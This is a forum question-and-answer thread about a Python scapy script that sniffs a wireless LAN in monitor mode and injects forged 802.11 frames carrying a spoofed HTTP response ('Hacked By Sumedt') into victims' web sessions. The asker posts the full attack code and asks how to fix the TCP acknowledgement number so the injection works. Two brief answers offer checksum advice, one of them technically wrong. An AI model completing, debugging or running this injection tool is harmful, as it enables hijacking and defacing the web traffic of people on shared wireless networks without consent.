Creating a spoofed HTTP response in a wireless LAN with scapy

1 vote
2 answers
2705 views
Asked 2025-04-18 00:37

I wrote an airpwn-like program with python-scapy. Right now I can sniff the network, forge an 802.11 packet, set whatever values are needed for the spoof, and send it to the victim's machine, but it does not work. I think I may be calculating the forged acknowledgement number (ack number) incorrectly. Please tell me how to recompute the ack number, or what I am missing.

#!/usr/bin/env python

from scapy.all import *
from scapy.error import Scapy_Exception
import os
import HTTP
##### Start promiscuous mode with airmon-ng start wlan0 11 (airmon-ng start/stop interface channel)
tmp=os.popen("iwconfig 2>&1 | grep ESSID | awk '{print $1}' | grep wlan | grep -v mon")
wlan=tmp.read()
wlan=wlan.rstrip('\n')
m_iface="mon0"
#spoof_response=rdpcap("response.cap")

def pktTCP(pkt):
    if pkt.haslayer(TCP):
        if HTTP.HTTPRequest or HTTP.HTTPResponse in pkt:
            src=pkt[IP].src
            srcport=pkt[IP].sport
            dst=pkt[IP].dst
            dstport=pkt[IP].dport
            test=pkt[TCP].payload
            if (HTTP.HTTPRequest in pkt):
                print "HTTP Request:"
                print "======================================================================"
                print ("Src: ",src," Sport: ",srcport," Dst: ",dst," Dport: ",dstport," Hostname: ",test.Host)
                print ("Seq: ",str(pkt[TCP].seq)," | Ack: ",str(pkt[TCP].ack))
                print ("Wireless: ",wlan)

                dot11_frame = RadioTap()/Dot11(
                    type = "Data",
                    FCfield = "from-DS",
                    addr1 = pkt[Dot11].addr2,
                    addr2 = pkt[Dot11].addr1,
                    addr3 = pkt[Dot11].addr1,
                    )

                #### Spoof HTTP Response
                day=time.strftime("%a, %d %Y %T GMT+7")
                #print day
                spoof_Page="<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\"><html><head><title>Hacked</title></head><body><p>Hacked By Sumedt</font></p></body></html>"
                len_of_page=len(spoof_Page)
                spoof_HTTP_Response_Header="HTTP/1.1 200 OK\x0d\x0aDate: "+day+"\x0d\x0aContent-Type: text/html; charset=UTF-8\x0d\x0aContent-Length: "+str(len_of_page)+"\x0d\x0a\x0d\x0a"
                Spoof_Payload=spoof_HTTP_Response_Header+spoof_Page


                #### Crafting HTTP Response Packet
                spoof_response=dot11_frame/LLC(ctrl=3)/SNAP()/IP()/TCP()/Spoof_Payload
                #### Spoof IP
                spoof_response.dst=pkt[IP].src
                spoof_response.src=pkt[IP].dst
                spoof_response.ttl=pkt[IP].ttl
                #### Spoof TCP
                spoof_response.sport=pkt[TCP].dport
                spoof_response.dport=pkt[TCP].sport
                spoof_response.window=dport=pkt[TCP].window
                spoof_response.seq=pkt[TCP].ack

                ### Recalculate chksum and ack              
                spoof_response.ack=(pkt[TCP].seq + len(Spoof_Payload)) & 0xffffffff
                del spoof_response.chksum
                ### For recalculate chksum
                spoof_response = spoof_response.__class__(str(spoof_response))

                print "Finish specific value"
                #spoof_response.show()
                sendp(spoof_response)

print "Start Sniffing"
sniff(iface=m_iface,prn=pktTCP)

2 Answers

0

After deleting spoof_response.chksum, I think you need to re-initialize that variable.

Like this:

spoof_response.chksum = spoof_response.__class__(str(spoof_response))
0

If you change the contents of the packet, the checksums in the MAC header and the TCP header have to be changed along with it. Otherwise the system treats the packet as corrupted and silently drops it.
